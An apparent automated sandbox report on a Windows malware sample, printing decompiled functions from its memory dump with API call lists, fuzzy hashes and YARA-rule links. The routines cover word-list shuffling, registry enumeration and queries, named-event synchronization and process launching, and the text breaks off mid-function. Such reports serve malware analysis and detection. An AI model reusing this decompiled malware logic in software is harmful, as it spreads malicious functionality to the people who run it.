			E04E962DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04E9A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04E9A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04E9A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4e9d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x04e962e1
0x04e962e8
0x04e962ed
0x04e962f0
0x04e962f7
0x04e962fa
0x04e962fd
0x04e96302
0x04e96307
0x04e9645b
0x04e9645d
0x04e9645f
0x04e96464
0x04e96464
0x04e9630d
0x04e96310
0x04e96313
0x04e96315
0x04e96315
0x04e96319
0x00000000
0x00000000
0x04e9631d
0x04e96349
0x04e9634e
0x04e96350
0x04e96350
0x04e96353
0x04e96356
0x04e96356
0x04e96358
0x00000000
0x04e96323
0x04e96325
0x04e96344
0x04e96344
0x04e9635b
0x04e9635b
0x04e9635c
0x04e9635c
0x04e9635f
0x00000000
0x00000000
0x00000000
0x04e9635f
0x04e96329
0x04e96370
0x04e96374
0x04e9644e
0x04e96450
0x04e96450
0x04e96451
0x04e96454
0x00000000
0x04e96454
0x04e9637d
0x04e9638e
0x04e96392
0x04e9644a
0x00000000
0x04e9644a
0x04e96398
0x04e9639b
0x04e9639f
0x04e963a3
0x04e963a8
0x04e96440
0x04e96440
0x00000000
0x04e96446
0x04e963b3
0x04e963bc
0x04e963d0
0x04e963d7
0x04e963ec
0x04e963f2
0x04e963fa
0x00000000
0x00000000
0x00000000
0x00000000
0x04e963fc
0x04e963fc
0x04e963fc
0x04e96403
0x04e9640b
0x00000000
0x00000000
0x04e9640d
0x04e96416
0x00000000
0x00000000
0x00000000
0x04e96418
0x04e9641a
0x04e9641d
0x04e9641d
0x04e96420
0x04e96424
0x04e96427
0x04e9642d
0x04e96430
0x04e96437
0x00000000
0x04e963b3
0x04e9632e
0x04e96336
0x04e9633c
0x04e9633e
0x04e9633e
0x04e96341
0x04e96343
0x00000000
0x04e96343
0x04e9631d
0x04e96363
0x04e96368
0x04e9636a
0x04e9636a
0x04e9636d
0x04e9636d
0x00000000

APIs

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

lstrcpy.KERNEL32(63699BC4,00000020), ref: 04E963D7
lstrcat.KERNEL32(63699BC4,00000020), ref: 04E963EC
lstrcmp.KERNEL32(00000000,63699BC4), ref: 04E96403
lstrlen.KERNEL32(63699BC4), ref: 04E96427

Strings

, xrefs: 04E96370

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: a7890871de87e586f2b9a64088a1f5c82f2bde39806da6309d8b15606f0d50c6
Instruction ID: 038843e268497e41c046c9ae2f5dedc0aa160ab7b2c45e844da19a79a3fc6eb9
Opcode Fuzzy Hash: a7890871de87e586f2b9a64088a1f5c82f2bde39806da6309d8b15606f0d50c6
Instruction Fuzzy Hash: 3151AD71A00118EBDF20CFA9C4856ADBBF6FF81319F15906BE8159B281C730BE528B80

Uniqueness

Uniqueness Score: -1.00%

Function 04E911EE, Relevance: 7.6, APIs: 5, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E911EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				WCHAR* _t19;
				long _t20;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x4e9d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4e9d2a8; // 0x9aa5a8
				_t3 = _t8 + 0x4e9e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E04E938A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4e9d2ac, 1, 0, _t30);
					E04E9A734(_t30);
				}
				_t12 =  *0x4e9d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t14 = E04E98EA1(_t32, 0); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t18 = E04E9A65C(); // executed
					if(_t18 != 0) {
						goto L12;
					}
					_t19 = StrChrW( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 =  &(_t19[1]);
					}
					_t20 = E04E9A273(0,  *_t32, _t19, 0); // executed
					_t31 = _t20;
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x04e911ef
0x04e911f6
0x04e91200
0x04e91204
0x04e9120a
0x04e91219
0x04e91220
0x04e91224
0x04e91236
0x04e91238
0x04e91238
0x04e9123d
0x04e91244
0x04e9129b
0x04e9129b
0x04e912a1
0x04e912a3
0x04e912a3
0x04e912a8
0x04e912ad
0x04e912b1
0x04e912c3
0x04e912c3
0x04e912c7
0x04e912cd
0x04e912cd
0x00000000
0x04e91254
0x04e91254
0x04e9125b
0x00000000
0x00000000
0x04e91262
0x04e9126a
0x04e9126e
0x04e91272
0x04e91272
0x04e9127a
0x04e9127f
0x04e91283
0x04e91287
0x04e912dc
0x04e912e2
0x04e912e2
0x04e91295
0x04e91299
0x04e912d0
0x04e912d2
0x04e912d5
0x04e912d5
0x00000000
0x04e912d2
0x04e91299
0x00000000
0x04e91283

APIs

Part of subcall function 04E938A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,05849A98,00000000,?,?,63699BC3,00000005,04E9D00C,?,?,04E95D30), ref: 04E938DE
Part of subcall function 04E938A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04E93902
Part of subcall function 04E938A8: lstrcat.KERNEL32(00000000,00000000), ref: 04E9390A

CreateEventA.KERNEL32(04E9D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04E93760,?,00000001,?), ref: 04E9122F

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

StrChrW.SHLWAPI(04E93760,00000020,61636F4C,00000001,00000000,00000001,?,00000000,?,04E93760,?,00000001,?), ref: 04E91262
WaitForSingleObject.KERNEL32(00000000,00004E20,04E93760,00000000,00000000,?,00000000,?,04E93760,?,00000001,?,?,?,?,04E952AA), ref: 04E9128F
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04E93760,?,00000001,?), ref: 04E912BD
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04E93760,?,00000001,?,?,?,?,04E952AA), ref: 04E912D5

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: fb9bf3184f546dd46c15044d2e74650c8a5232e15243d266de8f1f632f0e8e66
Instruction ID: 538d89d37f4e14c001f3769d90c626a2425b81203de3de2a1e794929f03bfd3c
Opcode Fuzzy Hash: fb9bf3184f546dd46c15044d2e74650c8a5232e15243d266de8f1f632f0e8e66
Instruction Fuzzy Hash: 1E2104326003126BEF397B698C44E6BB3E9FF89B19F551A25FD01DB1C4DB64EC019680

Uniqueness

Uniqueness Score: -1.00%

Function 04E93AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 04E93B0D
SysAllocString.OLEAUT32(04E985ED), ref: 04E93B51
SysFreeString.OLEAUT32(00000000), ref: 04E93B65
SysFreeString.OLEAUT32(00000000), ref: 04E93B73

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: f8d38d38dfe30475d4d7f4d2a05f85bb789faab5853448437cc225965bb5b8c3
Instruction ID: 4e25b48735acaaec64d3e03719097c1f9d48c1297928b9b73507f11829c43fa3
Opcode Fuzzy Hash: f8d38d38dfe30475d4d7f4d2a05f85bb789faab5853448437cc225965bb5b8c3
Instruction Fuzzy Hash: E131FC71900609FFCF04DF99D8948EE7BB9EF48315B20842AE90A97291E734AE41CB65

Uniqueness

Uniqueness Score: -1.00%

Function 04E9A446, Relevance: 6.1, APIs: 4, Instructions: 98
registrysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E9A446(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E04E9A71F(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32); // executed
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E04E9A734(_v28);
							goto L17;
						}
						_t42 = E04E9853F(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E04E9A734(_v24);
						_v20 = _v16;
						_t47 = E04E9A71F(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0x4e9d26c, 0) == 0x102);
				goto L16;
			}

0x04e9a446
0x04e9a460
0x04e9a463
0x04e9a466
0x04e9a469
0x04e9a46c
0x04e9a472
0x04e9a476
0x04e9a550
0x04e9a554
0x04e9a554
0x04e9a47f
0x04e9a486
0x04e9a48b
0x04e9a490
0x04e9a545
0x04e9a548
0x00000000
0x04e9a54e
0x04e9a496
0x04e9a499
0x04e9a4a0
0x04e9a4aa
0x04e9a4b3
0x04e9a4b9
0x04e9a4c1
0x04e9a4f9
0x04e9a533
0x04e9a539
0x04e9a53b
0x04e9a53b
0x04e9a53d
0x04e9a540
0x00000000
0x04e9a540
0x04e9a50e
0x04e9a513
0x04e9a517
0x00000000
0x00000000
0x00000000
0x04e9a517
0x04e9a4c6
0x04e9a4d5
0x00000000
0x00000000
0x04e9a4da
0x04e9a4e3
0x04e9a4e6
0x04e9a4eb
0x04e9a4f0
0x04e9a4cb
0x04e9a4cb
0x00000000
0x04e9a4cb
0x04e9a4f4
0x00000000
0x04e9a4f4
0x04e9a4c8
0x00000000
0x04e9a519
0x04e9a526
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04E93741,?), ref: 04E9A46C

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

RegEnumKeyExA.KERNELBASE(?,?,?,04E93741,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04E93741), ref: 04E9A4B3
WaitForSingleObject.KERNEL32(00000000,?,?,?,04E93741,?,04E93741,?,?,?,?,?,04E93741,?), ref: 04E9A520
RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04E93741,?,?,?,?,04E952AA,?,00000001), ref: 04E9A548

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: c1b09bd6036993be683be8c78cee537f81e2a3f932ec18d77b1ad82b4c25152b
Instruction ID: 522abb5e152faedb27ffaf8a101446ddb02c19cd23a6116d7a187ab2a900f936
Opcode Fuzzy Hash: c1b09bd6036993be683be8c78cee537f81e2a3f932ec18d77b1ad82b4c25152b
Instruction Fuzzy Hash: B4314972D00269EBDF21AFA5EC488EEFBF9EF84714F105466E911B2190D6346E509B90

Uniqueness

Uniqueness Score: -1.00%

Function 04E936B1, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E04E936B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E04E93BB9(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04E94F79(_t23);
						}
					}
					return _t38;
				}
				_t26 = E04E9A2F9(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x4e9d2ac, 1, 0,  *0x4e9d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					FindCloseChangeNotification(_t40); // executed
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E04E9A446(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E04E9853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04E94F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E04E911EE( &_v32, _t39);
					goto L13;
				}
			}

0x04e936b1
0x04e936be
0x04e936c4
0x04e936c5
0x04e936c6
0x04e936c7
0x04e936c8
0x04e936cc
0x04e936d3
0x04e936d8
0x04e936dc
0x04e93764
0x04e93764
0x04e93767
0x04e93769
0x04e93771
0x04e93771
0x04e93777
0x04e9377a
0x04e9377a
0x04e93777
0x04e93785
0x04e93785
0x04e936e8
0x04e936ef
0x04e936f1
0x04e936f1
0x04e93708
0x04e9370c
0x04e9370f
0x04e9371a
0x04e93721
0x04e93721
0x04e9372a
0x04e9372e
0x04e9373c
0x04e93730
0x04e93730
0x04e93731
0x04e93732
0x04e93733
0x04e93734
0x04e93735
0x04e93735
0x04e93741
0x04e93744
0x04e93748
0x04e9374a
0x04e9374a
0x04e93751
0x00000000
0x04e93753
0x04e93753
0x04e93760
0x00000000
0x04e93760

APIs

CreateEventA.KERNEL32(04E9D2AC,00000001,00000000,00000040,00000001,?,73BCF710,00000000,73BCF730,?,?,?,04E952AA,?,00000001,?), ref: 04E93702
SetEvent.KERNEL32(00000000,?,?,?,04E952AA,?,00000001,?,00000002,?,?,04E95D5E,?), ref: 04E9370F
Sleep.KERNELBASE(00000BB8,?,?,?,04E952AA,?,00000001,?,00000002,?,?,04E95D5E,?), ref: 04E9371A
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,04E952AA,?,00000001,?,00000002,?,?,04E95D5E,?), ref: 04E93721

Part of subcall function 04E9A446: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04E93741,?), ref: 04E9A46C
Part of subcall function 04E9A446: RegEnumKeyExA.KERNELBASE(?,?,?,04E93741,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04E93741), ref: 04E9A4B3
Part of subcall function 04E9A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04E93741,?,04E93741,?,?,?,?,?,04E93741,?), ref: 04E9A520
Part of subcall function 04E9A446: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04E93741,?,?,?,?,04E952AA,?,00000001), ref: 04E9A548

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
String ID:
API String ID: 780868161-0
Opcode ID: bcba8a541fc5d7a28dcb38ea1587136ccc11abc1662732f3209bb3fb9a9ed2c2
Instruction ID: a9801f9c13f0595661adc15db176b262c32faf2459c0d4c27c6d0072cb2385dd
Opcode Fuzzy Hash: bcba8a541fc5d7a28dcb38ea1587136ccc11abc1662732f3209bb3fb9a9ed2c2
Instruction Fuzzy Hash: 0421C8B3900215ABDF10BFE588848EFB3E9EF08359F105425EE11A71C0DB34BD458760

Uniqueness

Uniqueness Score: -1.00%

Function 04E98BC1, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E98BC1(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E04E9A71F(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E04E9A734(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12); // executed
					}
					L12:
					return _t43;
				}
				_t43 = E04E98B1C(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x04e98bcd
0x04e98bf0
0x04e98bfa
0x04e98c00
0x04e98c04
0x04e98c1c
0x04e98c21
0x04e98c69
0x04e98c23
0x04e98c2b
0x04e98c2f
0x04e98c66
0x04e98c31
0x04e98c43
0x04e98c47
0x04e98c5d
0x04e98c49
0x04e98c4c
0x04e98c4e
0x04e98c53
0x04e98c58
0x04e98c58
0x04e98c53
0x04e98c47
0x04e98c2f
0x04e98c71
0x04e98c71
0x04e98c78
0x04e98c7e
0x04e98c7e
0x04e98be6
0x04e98bea
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,05849B66,05849B66), ref: 04E98BFA
RegQueryValueExW.KERNELBASE(05849B66,?,00000000,80000002,00000000,00000000,?,04E9861E,3D04E9C0,80000002,04E93741,00000000,04E93741,?,05849B66,80000002), ref: 04E98C1C
RegQueryValueExW.ADVAPI32(05849B66,?,00000000,80000002,00000000,00000000,00000000,?,04E9861E,3D04E9C0,80000002,04E93741,00000000,04E93741,?,05849B66), ref: 04E98C41
RegCloseKey.KERNELBASE(05849B66,?,04E9861E,3D04E9C0,80000002,04E93741,00000000,04E93741,?,05849B66,80000002,00000000,?), ref: 04E98C71

Part of subcall function 04E98B1C: SafeArrayDestroy.OLEAUT32(00000000), ref: 04E98BA4

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 79fc43bc20d9166c024ef52342abff62c2087363c5d9212c64bd8a78352a85e2
Instruction ID: e9d4dd7bd6ccde26e6683609ff382b1060d1661e691c3b1a9ad05fb6f4e6fa70
Opcode Fuzzy Hash: 79fc43bc20d9166c024ef52342abff62c2087363c5d9212c64bd8a78352a85e2
Instruction Fuzzy Hash: 0C21457211015EBFDF11AF94DC80CEE7BAAFB09294B048076FE15971A0D632ED659BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E96545, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04E96545(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04E9A71F(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16); // executed
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x04e96551
0x04e96555
0x04e96556
0x04e96557
0x04e96559
0x04e9655b
0x04e9655e
0x04e96563
0x04e965fa
0x04e96601
0x04e96601
0x04e9656c
0x04e96573
0x04e96583
0x04e96583
0x04e96589
0x04e9658b
0x04e96590
0x04e96599
0x04e9659f
0x04e965a4
0x04e965af
0x04e965b3
0x04e965b5
0x04e965b6
0x04e965bf
0x04e965c3
0x04e965d4
0x04e965c5
0x04e965ca
0x04e965cf
0x04e965de
0x04e965de
0x04e965b3
0x04e965e4
0x04e965ea
0x04e965ea
0x04e965f3
0x04e965f8
0x04e965f8
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 04E96573
lstrlenW.KERNEL32(?), ref: 04E965A9
memcpy.NTDLL(00000000,?,?,?), ref: 04E965CA
SysFreeString.OLEAUT32(?), ref: 04E965DE

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: b6bfd3a03398d3e3ba794a4c2f2d53dfa2a598051b0b110fba2322f88bb9b2de
Instruction ID: be7a5203e0c32d8f1565da095a3ce174e4af6618afca3115a97ec363618047c8
Opcode Fuzzy Hash: b6bfd3a03398d3e3ba794a4c2f2d53dfa2a598051b0b110fba2322f88bb9b2de
Instruction Fuzzy Hash: 7B213E75D00209FFDF11EFA8C98499EBBF4EF58305B10456AE90697254EB30EE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E9486F, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E04E9486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

